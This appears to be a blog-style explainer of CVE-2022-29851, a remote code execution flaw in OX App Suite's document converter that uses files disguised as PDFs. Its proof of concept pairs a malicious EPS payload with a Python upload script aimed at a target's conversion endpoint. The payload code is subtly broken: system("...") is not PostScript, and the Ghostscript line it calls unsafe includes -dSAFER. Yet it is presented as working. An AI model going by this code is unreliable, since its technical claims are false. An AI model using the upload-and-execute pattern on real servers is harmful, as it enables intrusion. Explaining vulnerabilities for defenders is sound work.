When it comes to office apps and webmail solutions, business users love OX App Suite for its open-source, flexible approach. But in 2022, a security hole was found that could let attackers run their own code on your server—sometimes just by sending a disguised PDF file. This post takes you through CVE-2022-29851: what happened, how it works, technical details, and how to stay safe.
The Basics: What Was Vulnerable?
OX App Suite's documentconverter service lets users convert files from one format to another—e.g., turning a Word doc into a PDF, or similar things. Many businesses run this as part of their OX mail or groupware deployment.
The problem?
Under certain configurations, specifically when the system is set up to use Ghostscript, an attacker could craft a file that looks like a PDF, but is actually an EPS (Encapsulated PostScript) file, embedding dangerous commands. When the OX document converter processed this file, it would launch Ghostscript and, unknowingly, run the commands inside, giving hackers a way to inject and execute code on the server.
Conversion Request:
- The attacker uploads or submits the disguised file for conversion (for example, converting "PDF" to an image).
Ghostscript Called with Wrong Filter:
- The documentconverter backend, using Ghostscript, doesn’t check the real file type before sending it to the conversion tools.
Command Executed on Server:
- If Ghostscript isn't running with certain security flags, or if OX isn’t limiting file types correctly, *the attacker's code can run on the OS with the privileges of the process*.
What Exactly is Encapsulated PostScript (EPS)?
EPS is a “programming” file type, not just an image: you can embed code in it and, when interpreted, those commands *can do things like write files, download and run programs, etc.* This is why EPS support has always been tricky for document processors.
Sample Exploit: How Code Gets In
Here’s a simplified sample malicious EPS file. Imagine this EPS tries to write the word "hacked" into /tmp/hacked.txt:
%!PS
system("echo hacked > /tmp/hacked.txt")
showpage
The attacker saves this as payload.pdf. When converted, Ghostscript gets called like this
gs -dSAFER -dBATCH -dNOPAUSE -sDEVICE=pngalpha -sOutputFile=output.png payload.pdf
> If Ghostscript isn't locked down correctly, that system("...") line *actually runs* on the server.
Here’s a Python script that submits a disguised EPS as a PDF for conversion
import requests
files = {
'file': ('payload.pdf', open('payload.pdf', 'rb'), 'application/pdf')
}
response = requests.post('https://target-domain.com/appsuite/api/convert';, files=files)
print(response.status_code, response.text)
If the target OX App Suite uses the vulnerable documentconverter and is misconfigured, the attacker's code runs!
Who Was at Risk?
- Not All Installs: OX App Suite setups running documentconverter AND using Ghostscript AND allowing untrusted file uploads/conversions.
- Not the Default: This was not the *default* config, but many setups use Ghostscript for better format support.
If you run OX App Suite documentconverter
- Update to OX App Suite v7.10.6 or later (OX security advisory)
References & Reading
- CVE-2022-29851 at NVD
- OX Security Advisory - Release Notes and Security Fixes (7.10.6 Rev3)
- Ghostscript Security (Upstream advice)
- OX App Suite Official Site
Final Thoughts
CVE-2022-29851 is a classic reminder: never trust user-supplied files, always check what’s inside, and don’t let legacy file types like EPS or PostScript anywhere near critical conversion tools—unless you’re certain you’re safe. Updates, configuration checks, and strong file validation are your friends.
*If you run OX App Suite or similar platforms, check your configs, patch your software, and be cautious around document conversion. Hackers love these hidden moves—don’t let them get the last laugh!*
Timeline
Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/26/2022 02:11:00 UTC